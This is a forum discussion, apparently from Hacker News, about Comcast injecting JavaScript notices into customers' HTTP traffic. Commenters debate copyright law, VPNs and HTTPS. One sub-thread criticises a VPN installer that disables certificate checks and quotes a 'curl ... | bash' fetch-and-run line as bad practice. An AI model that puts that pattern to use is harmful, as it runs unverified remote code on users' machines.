The header and people's reactions makes it seem Comcast will just do this on a whim as if it's inspecting the page you visit and deciding on the page to display the warning or not. If you read the screenshot, it's just a notice that someone filed a complaint against your IP, and Comcast is alerting you via email, maybe phone, maybe even a letter, and now your web browser. One might argue whether it's better they redirect you to a Comcast Message Page on their own domain one time. One might argue that this is a "feature" on the level of Comcast DNS servers that "helpfully" forward your bad domains to a search engine instead of giving a proper server not found response.
Don't want to receive these messages from Comcast? Don't seed your torrents.
This is correct. It is only performed after you are sent emails, letters, phone calls, etc. We do the same for when you are about to exceed your 300GB of data. Most people don't give us a good email, don't login to check it, don't login to their comcast account, etc... This type of notification is to cover those people. We are working on better ways to do this, see: https://www.caida.org/workshops/aims/1503/slides/aims1503_ba...
Alternatively, your company could choose not to act as a copyright cop.
Edit: Actually, reading the IETF link you posted, notifying users of a potential malware infection might be an example of how to use this technology in a non-shitty manner.
These companies aren't necessarily choosing to be copyright cops. I can't imagine that sounds very fun or beneficial to them. Systems were negotiated under legal pressure from the RIAA and MPAA.
Of course, Time Warner and Comcast are both also content creators, so they might have some motivation to concede.
Yes, when I wrote custom page tracking software for a custom forum I wrote and hosted, I was parsing out User-Agent information and would actually notice malware browser add-ons, and I'd gently post a notice at the top of my web page alerting them that they might want to run some malware scans. Security vs. privacy right there. That was a long time ago, and I don't track anything any more, but it was an interesting experiment.
Perhaps a captive portal and redirect would be a "nicer" way of doing this. At a bare minimum, it's less intrusive, and it's an accepted practice when using a provider's internet (especially wireless). Injecting JS into a page that I've requested from a third party server would erase my trust in that provider, and I would immediately cancel my service the first time my provider performed that action.
Internet Services engineering, mainly working on measurement, instrumentation, and customer experience. My group runs our Speed Test, SpeedExperience, Next-gen access trials, our RIPE Atlas probes/anchors, etc..
Whichever team is behind the account system needs work. Why do I have four Comcast accounts? I've only even lived at three different places. Why can I still login and "pay my bill" which still says I owe "$39.99" on my last account? I was paying into it accidentally for months before they killed my new service because I wasn't paying into the new account.
It seems to me it's just hacks on top of hacks written by hacks.
Yes! This happened to me too! I moved to a new house, they configured service and "transferred" my account.
Three months later, my service at the new house is disconnected for non-payment. I look at my bank statement - sure enough, AutoPay happily withdrawing the amount...
... and applying it to the old house's (disconnected) cable, the account for which is now several hundred dollars in "credit" (paying $200/mo for business service).
It was (relatively) easy to get resolved, thanks largely I think to the business support folks. But still... :|
Maybe try a certified letter first? Also, they don't require YOU to ack, they require SOMEONE to ack, as I don't see anywhere where they actually have the "acker" verify that they are the account holder. I wonder if there is a legal loophole that the account holder could use as they can't prove that the account holder is the one that acked.
This comment is the only real explanation of what's going on here. I'm not sure why it's buried. It seems people are just reading the headline and breaking out the pitchforks and torches. I understand the issues of privacy here, but it also seems the context in which this is taking place is an important thing to consider, as well.
I think this is actually illegal. If you own the copyright for your content and they inject into it, they are creating a derived work without your permission.
I would hope not, because by a similar argument adblockers and userscripts would also be illegal. I don't agree with what Comcast is doing, but using this argument could end up with an even worse slippery slope that leads to users not being able to consume content/customise their computing environment in the way they choose to. On the other hand, if Comcast is your ISP, all your traffic does pass through equipment owned by Comcast, which --- if you believe in being able to have control over your devices --- they should likewise also have the right to control. All the traffic on my home network goes through an adblocking proxy, and I could do things like http://www.ex-parrot.com/pete/upside-down-ternet.html if I really wanted to. I certainly do want to maintain control over the traffic within my network.
That happens at the user's choice at the user's machine, and isn't being distributed any further. The ISP distributes this modified content to their "customers".
There may also be an interpretation in which you're not even modifying the work by using an adblocker.
If you define the work as the source code you're not actually modifying it. You're just declining to download subsequent works (iframes, flash, whatever).
At least in the United States (and the UK), the copyright owner of the original work has the exclusive right to prepare derivative works, regardless of whether the derivative work is published, distributed or used in any other way.
"De minimis" (minimal) changes won't create a derivative work. What counts as "de minimis" has been debated extensively, but sales stickers certainly do.
Creating derivative work is only illegal if you do it without permission from the copyright owner of the original work.
I don't know what you mean by "doesn't seem very valid". It is the law [1].
Annotations normally create a derivative work. That being said, annotations often end up being covered by fair usage (fair dealing in the UK).
>I don't know what you mean by "doesn't seem very valid". It is the law
Apparently it's not the law, as the link doesn't contain the words "distributed or used in any other way" or anything to the effect of "any other way".
Plus, the "de minimis" thing and fair use exceptions mentioned in your second comment, already scale down the absolute "any other way" qualifier.
I think you may be misunderstanding something. The owner of the copyright has exclusive rights to prepare derivative works (or authorise someone else to do so). There are certain exceptions. What's unclear about this?
Maybe "used in any other way" confuses you? It's standard legal language and it means publishing, public performance, creating mechanical copies, etc. The possible uses of a copyrighted work are numerous and due to advances in technology that list grows constantly. This expression makes it unnecessary to list every known possible use, or yet-to-be-discovered futures uses.
>I think you may be misunderstanding something. The owner of the copyright has exclusive rights to prepare derivative works (or authorise someone else to do so). There are certain exceptions. What's unclear about this?
The fact that "certain exceptions" weren't mentioned in the first comment. I quote: "the copyright owner of the original work has the exclusive right to prepare derivative works, regardless of whether the derivative work is published, distributed or used in any other way."
There was no reference to "certain exceptions", "fair use" and the possibility of "minimal" (and thus allowed) changes.
That, plus the use of "used in any other way" (a "standard legal language" as you say) as part of a casual language comment, left the impression to the reader that only the copyright owner or someone with permission from them can create derivative works, period.
So while this is cleared out now after the extra explanations, the initial comment was quite unclear.
>I would hope not, because by a similar argument adblockers and userscripts would also be illegal.
Does not follow. Ad block is set up by the user to block connections. Your work doesn't change; the user just doesn't see the full work. Kinda if I gave you glasses that blocked the color red and then you went and looked at an art gallery wearing them. The art hasn't changed, but the item I gave you, which you willingly wore, just stops some part of the art from being displaying into your eye.
I don't think you understood the post (admittedly the title is unclear).
If the title were "Comcast injects ... to show notices of reported copyright infringement against their account," there would probably be less confusion in the comments here.
I'm sure a content publisher could argue that by stating that the transport layer does not transform the content, that any such transformation (that the end user perceives) constitutes harm to them.
Such is law. That header gives them a basis for constructing this argument.
To use a sample you have to get a license from the original artist:
>Today, most mainstream acts obtain prior authorization to use samples, a process known as "clearing" (gaining permission to use the sample and, usually, paying an up-front fee and/or a cut of the royalties to the original artist). Independent bands, lacking the funds and legal assistance to clear samples, are at a disadvantage - unless they seek the services of a professional sample replay company or producer.
It doesn't. Sampling is technically illegal. However the bootleg market is often too small to go noticed and larger artists get authorisation before sampling (or at the very least - releasing).
You do often see some artists turn a blind eye to sampling though. Particularly dance artists because many of them know their entire genre exists of the back of sampling. So it would be counterproductive / hypocritical for them to chase after royalties
Sample clearance is generally not required if:
- You are just using the sampled music at home.
- You are using the sample in live shows. This is because,
usually, you are not making copies and the owner of the venue
pays the blanket license fees to performing rights organizations
such as Broadcast Music Incorporated (BMI) or American Society of
Composers, Authors, and Publishers (ASCAP).
- You plan to distribute copies to the public but meet one of the
following: (1) an average listener would not notice the similarities
between your end product and the sample, or (2) your use of the
sample falls under the "fair use" doctrine. For more information on
these, see "Defending a Lack of Sample Clearance," below.
The `checkBrowser` function says it is from brainjar.com and used under their terms of service. On the brainjar.com terms of service, it seems to say the code is licensed under the GPLv2+.
Doesn't this make the Comcast script now under the GPL - since GPL code can only be included in compatibly licensed products. Or is Comcast violating the GPL?
This is a crappy move on Comcast's part, but as far as GPL they most likely are not in violation. You can use GPL code in a commercial product as long as you are not distributing it.
If they ever choose to sell or distribute their "content injection system" though, they would have to release it under the GPL or else negotiate another license from the copyright owner.
How are they not distributing it if they send this JavaScript to each user notified? Of course it's JavaScript so maybe that counts as distributing the source...
AGPL fixes this problem for backend code running on the web server, which is technically not distributed, so GPLv2 does not apply. For Javascript code, the code is distributed to the web browser, so even GPLv2 applies.
If the `checkBrowser` function uses GPL'd code, then anything that calls `checkBrowser` in turn must be licensed under the GPL.
But that doesn't mean that this Comcast code _is_ licensed under the GPL. That means that the copyright owner (brainjar) can take action against Comcast, and tell them to either stop using their code, or change the license.
If Brainjar had licensed this code AGPL then Comcast would have to release their code. But since it's GPL 2 then they have no legal right to require Comcast or anybody else to stop using their code. That's one of the great things about GPL (or horrible things, depending on your intention)
Read up on your licenses folks, make sure your code is used the way you intend.
Always using VPN has really made using Internet a lot nicer place, I can use any Wifi without any fears, don't have to care about ISPs doing funny things with my traffic, and if I get country blocked content I can just quickly route my traffic to another exit node.
Of course then the VPN provider is the single point of failure, but if it's trustworthy enough only folks with proper court orders should have access to my traffic. And it's an extra ten bucks per month or so.
" Streisand sets up a new server running L2TP/IPsec, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, and a Tor bridge. It also generates custom configuration instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists. "
On the other hand, while your VPN or VPS provider may be no more trustworthy than your local ISP, it's _much_ easier to switch VPN providers - and you can arrange to have them in a different jurisdiction as well - If my net connection is through a proxy server in the Netherlands run by a company from Germany in a datacentre owned by a Japanese firm and I'm in Australia browsing websites in the US - there's a lot of legal hoopjumping needed to get to me.
I know I'm being unfairly picky when I should be thanking you for building a helpful install script; but your install instructions seem very counterintuitive given the privacy argument of running a VPN:
Aside the lack of https scheme in the URL, you're also deliberately disabling the certificate authentication and then directly running the output into bash.
Granted the double ampersand offers some protection, sadly it's still little better than the often criticized:
curl http://example.com/install.sh | bash
Plus the address you supplied is a shortened URL so the user has to trust that the file it redirects to is the same Github hosted file that's in the referenced repo.
I do appreciate the work you've done. But given the security and privacy expectations of VPN, it might be worth having a little more transparency in your install instructions - even if that means splitting your instructions into 2 lines.
> given the security and privacy expectations of VPN
The security and privacy expectations are that the network for the server is not compromised. If that's not the case, why would you want the VPN hosted there in the first place?
You cannot control what happens beyond your own hosted infrastructure. Even the most trusted networks are still at the mercy of external DNS servers, web servers and routing equipment. Hence the entire point of trusted signed certificates.
Just because a persons hosted VPS might be trusted it doesn't mean that:
1. The git.io redirects to the expected location. Anyone could clone your git repo then put a malicious script in a different shortened URL
2. Nor that someone couldn't MITM between the the user and the git.io
3. Nor similar MITM attacks between git.io and github
Security is only as good as the strength of your weakest link.
Not if you're running HTTPS you're not. You cannot have code injected into a HTTPS connection like you could with plain text HTTP. And even in the worst case scenario where the entire connection is re-routed to a rogue server: you would get a nice big warning that your connection isn't secure and the download would fail. Thus again preventing the malicious code from running on the users VPS.
You're also still ignoring my first point as well.
I really don't get your careless stance here. Github already comes with an SSL cert and you don't actually need a URL shortened for the type of link you're publishing. So all of these complaints people are making are so very easy to solve. But instead you are intentionally following bad practices. Frankly, if this is your attitude towards security then I really don't think you're the sort of person who should be writing installers for VPN servers to begin with.
Yes, you are. If your adversary can MITM a datacenter, it's likely that a rouge cert can also be obtained from a trusted CA. If your threat model includes this kind of adversary, please don't use my script. You should also consider how funny would be to host a VPN and route your traffic like this in a network which you don't trust.
> You're also still ignoring my first point as well.
What would an adversary accomplish pointing a DIFFERENT short URL to a malicious script? I don't understand. I'm only using/listing git.io/vpn, so whatever someone does with other URLs is not my problem. There is some fork using git.io/ovpn for example.
> I really don't get your careless stance here.
I'm not careless. You can either run the one-liner which clearly states --no-check-certificate or download and examine the script as long as you want. The choice is on you.
> Github already comes with an SSL cert
But minimal distro images don't come with trusted CA certificates, so it's useless. Yes, I could install them. No, I don't want to.
> Yes, you are. If your adversary can MITM a datacenter, it's likely that a rouge cert can also be obtained from a trusted CA.
One cannot simply obtain a cert from a trusted CA. Hence how they become signing authorities. Granted it's not impossible to do, but it is very difficult. Certainly a far better assurance than not running HTTPS at all.
> If your threat model includes this kind of adversary, please don't use my script. You should also consider how funny would be to host a VPN and route your traffic like this in a network which you don't trust.
We're not talking local network here - literally nobody can trust the internet. Hence why CA's exist in the first place. This isn't some weird edge case threat model, this is something that's well known and already handled. And it's something that is already supported by Github but you are intentionally breaking.
> What would an adversary accomplish pointing a DIFFERENT short URL to a malicious script?
Do you really need that answered for you?
1. Clone repo
2. Publish their own shortened malicious URL in cloned repo
3. ???
4. Profit
It's called "social engineering" and actually quite a comment method of attack.
> I'm not careless.
Given this script is aimed at less-technical people, I'd say it's rather presumptuous to assume they'd even realise just how careless it is to run a script downloaded from an unverified source.
> But minimal distro images don't come with trusted CA certificates, so it's useless. Yes, I could install them. No, I don't want to.
That's an edge case. You can add a comment to disable the certs in that edge case - or better yet, instructions on how to install the CA certs.
Every excuse you make is really just a plea for your own laziness. "it's the users responsibility" - no it's not, you're providing instructions for them thus it's your responsibility to get those instructions right. "they might not have CA installed", so add a footnote about installing that. I mean seriously dude, Github have already handed you the tools you need securing the install - there's literally no good excuse for disabling them.
> One cannot simply obtain a cert from a trusted CA.
One can't simply MITM a datacenter.
> literally nobody can trust the internet. Hence why CA's exist
lol
> it's something that is already supported by Github but you are intentionally breaking
I'm not breaking anything. It is supported by GitHub but not by many of the client machines (by default).
> It's called "social engineering" and actually quite a comment method of attack.
I unfortunately can't fix user stupidity.
> That's an edge case.
That's when you've proved you have no idea about what my user base is. Minimal images are very common for OpenVZ templates.
Anyway, and to end this: you've already stated your points and I've given you my explanations. You can either accept them or not, but I don't want to waste more time on this - feel free to fork if you don't like it.
SSHing onto a Linux server in some secure datacentre doesn't magically mean that everything that server connects to outside of the datacentre is also going to be secure. I assume that you do actually understand how the internet works? :p
> I'm not breaking anything. It is supported by GitHub but not by many of the client machines (by default).
Of course you're breaking things. You're breaking the security of HTTPS by disabling cert checking. And you're breaking readability of your install code by using URL shorteners.
As for HTTPS not being supported by many of your client machines by default, it's so very easy to rectify:
$(which apt-get yum) install ca-certificates
This will work on Debian and its derivatives as well as the usual Redhat derivatives too. So that one line and works on all your supported platforms. It really is that simple. :)
> I unfortunately can't fix user stupidity.
But you're forcing user stupidity by using stupid defaults. It's quite literally your fault that they're being stupid as you're recommending they do stupid things.
> That's when you've proved you have no idea about what my user base is. Minimal images are very common for OpenVZ templates.
I happen run a hosting as a side project and almost exclusively use OS containers for personal projects. So I'm well versed in these kinds of containers and the kind of users you're targeting. You're just making excuses for bad security practices.
> Anyway, and to end this: you've already stated your points and I've given you my explanations.
You've given excuses, not explanations. I've demonstrated how easy it is to work around the limitations you've put in place. You've just given lazy excuses as to why you couldn't be bothered.
The crux of the matter is when building gateways you should NEVER default to insecure settings like you are currently doing. Period.
> feel free to fork if you don't like it.
To be quite honest, it could benefit from a complete rewrite. The code is functional but messy, your OS detection could use a little fine tuning too. But the real problem is that there's more instances within your script of code getting pulled from the internet with certificate checking disabled, and that would also need to be fixed (but at least you're not using URL shorteners there).
Your intentions are noble, but sadly your execution is less so. Which is what happens when you never listen to advice. And looking at the comments on your repo, this has been an issue that has been raised a multitude of times before. So it's not just me being an elitist :)
But, I always feel a little annoyed when people complain about piping curl into bash. If you know enough to see the danger, you also know enough to avoid it. Just curl to a file and read it, or open the web page and read it. Take some responsibility.
I'm with you on the https and the short link, though.
Yeah, but at least there haven't been any (high-profile) abuses, yet. Meanwhile Verizon and now Comcast have been caught tampering with their customers' traffic, and those are probably just the well-publicized cases. Maybe I am just blissfully unaware of VPNs' shenanigans.
Cox injects HTML into your HTTP connections. I've recieved popups on pages saying they've spotted traffic from a botnet server over my connection, and that my computer may be infected. I talked to Cox support and they view it as a feature.
Even the $10/month Linode plan has 2TB of data transfer. If you use it as a VPN you'll have to halve that since you are using it as a conduit. You still get 1TB which is 3x the Comcast data limit. I say VPN everything.
I tried doing the same with my mobile but it either eats my battery alive or kills instant notifications. I HATE that tracking tag that mobile carriers are adding.
Linode only counts download towards the data transfer, so you can pump 2TB through, as they only count the data one time, as it's heading out of the VPS.
If anyone is interested, you can get TigerVPN lifetime for 30$ (one connection slot) or find online (I found one on reddit) TorGuard 50% coupon for 2 years service, but 5 slots and more endpoints. I use both from UK, and Internet is clear over there.
What? VPN connection is encrypted and (hopefully) authenticated. You can't inject data into that stream. Or you can, and completely break the connection.
You just middleman the vpn authentication via wifi - by spoofing the wifi router you THINK you are connecting to, but it's not really because its just emulated with a stronger signal so your device thinks everything is fine.
If you try to do that, the VPN client will notice that the spoofed server isn't presenting a valid certificate or doesn't use a valid key, and refuse to connect. Same reason you can't "just" middleman an HTTPS connection.
Besides, there's no need to spoof. The point of the VPN connection is to protect against the wifi router (even the legitimate one!) reading the traffic. By spoofing, you're just replacing a dodgy wifi router with another dodgy router.
Programs running on your PC can do it because they have access to your certificate store, and can tell the system to trust their certificate.
Entities not in control of your PC can't MITM an HTTPS connection, barring a catastrophic bug. And it is catastrophic. If you have a way to do this, please tell everybody because it's going to be the next Heartbleed.
The entire point of HTTPS is to prevent stuff like you're describing. And it does work, for the most part. Bugs happen, but they get fixed as they're discovered. It's definitely not "extremely easy."
Please go read up on this stuff before speaking authoritatively:
That's only because the antivirus/firewall products have access to your machine and install a root certificate on them, or more likely, are just using a browser extension to rewrite the dom on the fly.
More succinctly, the phrase "man in the middle" kinda loses meaning when the man in question is your own computer.
I don't know about all VPN technologies, but OpenVPN does authentication with client and server certificates. Just spoofing the WiFi router is not going to let you spoof that.
Hm.. if I delete the element from the DOM without clicking the button (trivial if you use the inspector), does this imply I do not confirm that I've received the Copyright Alert?
Edit: Also, I'm sure most people will just click the button without reading anything.
you don't want to use the inspector- this popup probably hits you on every single page until you finally agree. Instead, use an adblocker to identify some unique element class, and it will be blocked every time.
You don't have to use Comcast. I sacrificed Comcast's speed and went with a local, privacy conscious DSL provider and I couldn't be happier. I'm getting about 6mbps with dual bonded phone lines. It's kind of pricey at $80 but it's worth it knowing I'm dealing with an honest business. In most areas there are alternatives and DSL is available everywhere, it's worth it even if it's a lot slower for the peace of mind. As long as you don't trade in one evil giant corp for another like AT&T or Verizon.
I don't think this is reflective of most consumers in the US. I have a family of four. I couldn't imagine the kids working on school work, watching Netflix, or gaming while I try to teach online all while on a WiFi router connected to DSL. While it may work for you, the fact of the matter is that it likely will not work for many, hence the reason Comcast can get away with this crap (well, that and the monopoly).
>* I couldn't imagine the kids working on school work, watching Netflix, or gaming while I try to teach online all while on a WiFi router connected to DSL.*
At 6mbps? Tons of consumers in the US get even less...
In a similar situation here, 4 adults in a household currently on DSL (Approx 10mbps down / 0.6mbps up, best available speeds on DSL here).
Between two TVs using Netflix (usually no more than one at a time, but frequently) and me playing online games the connection becomes about useless.
Ping times shoot up past 1000ms making online gaming impossible, downloads are obviously slow (and interfere with Netflix streaming), and there's frequent connection bugs (stalls for 2-5s seemingly randomly).
Only other "Real" choice is Comcast, but I'm very reluctant due to their behavior and potential of implementing low caps. (Not currently in WA state)
4G isn't an option because data caps, sat (Which I used previously where I lived before) has extremely high latency and low caps (Obviously no multiplayer gaming there either), and of course nobody wants to deal with dialup in 2015.
A cheaper and faster way would be to buy a small cloud server install openvpn on it. Then get a nice router and configure it to send all your trafic throgh the vpn.
Really? The last place I lived had the option of Comcast or maybe Verizon DSL at 1.5Mbps. Verizon didn't know if they could provide service or not, thus the "maybe." And that was it. This was true when I moved out three years ago, and it's still true for the people living there today.
So, "You don't have to use Comcast"? Actually, some people do unless they're willing to give up broadband altogether.
Many people do. I can use comcast or go to satellite. DSL is not even an option as I'm too far away. Satellite is not a high speed option in my opinion.
I wonder what's in it for them? Sending an email should be enough to comply with DMCA. Are they paid by some copyright groups or just being a pushover?
I was thinking the same thing - a nontrivial effort has clearly been spent on implementing this, and it certainly would not be well-received by most if not all of its customers.
Is there a reason to believe such case would have a chance of succeeding? I thought DMCA clearly protects the ISP as long as they forward the complaints to the offending customer?
Cox Communications also injects js to display downtime messages and data usage alerts when nearing the upper limits of their now enforced data caps. Their response to a FCC complaint was essentially "it's convenient for our users"
The script is inlined, so blocking by origin seems not possible. You could write a greasemonkey script (is that still a thing?) or write an extension which removes the line
I think you could also insert a script in the document head that adds an event listener for beforescriptexecute that checks for and cancels execution of the comcast script. A website could do this themselves even.
Better yet, block the script if detected, then fire the acknowledgement.
It seems to me, as if they also do some magic to intercept requests to the currently visited page. They use a relative path url (SYS_URL) to poll for a state and to send the acknowledgement (functions checkBulletin() and sendAck()). From my understanding that would be a request to the current domain/visited page, right?
So they just intercept their 'own' magic url, but it bothers me somehow.
Can anybody confirm this? My uptime is far beyond reasonable.
Out of curiosity, I wanted to know what the maximum z-index is. The CSS 2.1 spec doesn't present this information, but it turns out to be 2147483647 (the maximum value for a 32-bit integer).
Now what does that z-index say about the JavaScript developer who chose it? "Fuck it, 999999 is enough." Man, what a tool.
Well it is a very high zIndex, which of would force the element in the plane 99999.
What it says about the developer though, is that he didn't bother reading up on, what is the highest value, but just chose a rather high value of 99999.
Hiding this is counterproductive; trivial as it may be, and this goes for everyone, please don't publish such an extension. People need to see this and get pissed off, complain to comcast, understand why https is needed.
This will only remove the message, but will not prevent the other unwanted stuff: Calling back to Comcast with a seemingly personalized token (in SYS_URL).
If i am not mistaken, they query every 5 sec (via checkBulletin()).
There was a link posted here not long ago that pointed out the proliferation of arbitration clauses in contracts and customer agreements. No doubt your agreement with Comcast has such a clause.
Is there an example of this in action Jarred? I'm on a Comcast connection right now (DSL was too slow). Looks like it has been happening for a while -- from 2013:
TimeWarner does this as well. I don't have proof, but when my roommate was torrenting stuff, no vpn, nothing, I had a notification like this pop up on a random web page. This kind of shit has got to stop.
I don't live in the US, but what are the countermeasures for exploits like this? Is there a local proxy that can strip this and similar js out, and would it be simple enough for non-expert users to deploy?
Oh no. You get the browser notice, the email, the text message, and then finally two days later a phone call that will KEEP CALLING until you acknowledge it through a series of key pad press prompts.
I'm glad they're responding to negative public opinion in the only honorable way, driving themselves out of business. It's so rare to see a corporation with values.
I had a situation with our local ISP where they injected some banner on each page to let users know they were close to going over their bandwidth usage when they got to like 90%. I reached out to them and said this was essentially a man in the middle attack and that I didn't want messages injected. A week later they messaged me to say it had been removed.
I've been noticing an issue when getting bandwidth limit notifications. The same injection technique is also being used. When I attempted to filter out these messages, Comcast promptly reduced my internet speed to 1Mb. It took 3 calls over two days to realize that they were doing this as a reaction to my inability to receive the notices.
This might not be relevant to the topic(I don't use Comcast), but Im curious how web elements are forced to be overlay consistently across all websites, doesn't the existing css properties on the page affect the behaviour of the injected scripts?
It's done via the 'z-index' CSS property [0]. Essentially, the higher the z-index, the higher the priority of the element; a higher z-index will appear in front of a lower z-index.
This means Comcast is assembling the packets up to the application layer for deep inspection and injection, which slows down receipt of the packets because it must receive the full payload before processing, reassembling, and transmitting.
The root of this problem is that there is no "control channel" (or whatever you want to call it) from an ISP to its customers. Email doesn't work because ISPs don't always have the customer's address and email can get spam filtered. Paper mail is expensive and may not be read. Until someone defines and implements a protocol for this, ISPs are going to keep inventing weird kludges. I wonder if Hotspot 2.0 can be adapted for wired networks.
It's probably stupid, but I'll admit I haven't looked at my cable bill for well over a year. I have paperless billing, it auto charges to my credit card, I see that the amount is the same every month, and that's it. If they include any messages with the bill, I never see them. If they sent me something via snail mail I'd probably read it, unless I mistakenly thought it was junk mail and threw it out without looking at it.
The junk mail thing is there own doing. I missed two months of letters from our ISP saying the bill hadn't been processed because I threw them out, assuming it was yet another letter trying to sell me the service I already have.
Paper mail costs maybe 50 cents for a regular letter. If "may not be read" is a concern, send it certified. That costs all of $4. Too expensive? This is a company that charges $10/month to rent a $50 cable modem. They get none of my sympathy when it comes to cost. If negative sympathy were physically possible, I'd give them that.
This problem you describe is solved. Businesses all over the place manage to figure out how to communicate with their customers, but you want me to believe that Comcast is in some impossible situation where their only choice is to corrupt the data they're transmitting?
If you need to get in touch with your customers, then you can:
1. E-mail.
2. Call.
3. Send a letter.
4. Send a certified letter.
And if none of that works, disconnect the service since there's obviously nobody living there anymore. If the $4 for a certified letter breaks the bank, then add a clause to your service contract that says the customer has to pay it back if it ever gets to that point.
Not every problem needs to be solved with computers over the internet.
Email doesn't work because ISPs don't always have the customer's address
What ISPs don't provide an email account (usually something like username@isp-domain) with their service? I thought that was the standard way to do things, and it's what mine does to send me alerts about service outages and maintenance windows.
Fundamentally there are two types of programmers, those who are interested in programming in all it's forms and actively seek out communities with similar interests (you see this in framework communities and language communities particularly) and those who don't, the second set may be good programmers or not (I'd suspect having met some of them that the average second set programmer is not as capable as the first set but that's anecdotal).
They also tend to be the ones who use whatever tool they are using for a long time and argue "good enough is good enough" as a justification for not learning new things.
I know this is a horribly broad generalization but I have seen it repeat constantly over time, you also tend to find them working for large organisations or on legacy stuff that wasn't legacy when they wrote it.
Again, horribly broad generalization and some enterprise programmers are amazing.
I wonder in terms of ethics. Why don't they tell the bosses it is unethical? Like bankers software engineers need some ethics treatment. I look at you who add multiple trackers to websites.
Only on websites which actually have https version. Many do, but many don't. It's usually ~100% on websites I use daily and goes well below 50% when I try to google for anything uncommon.
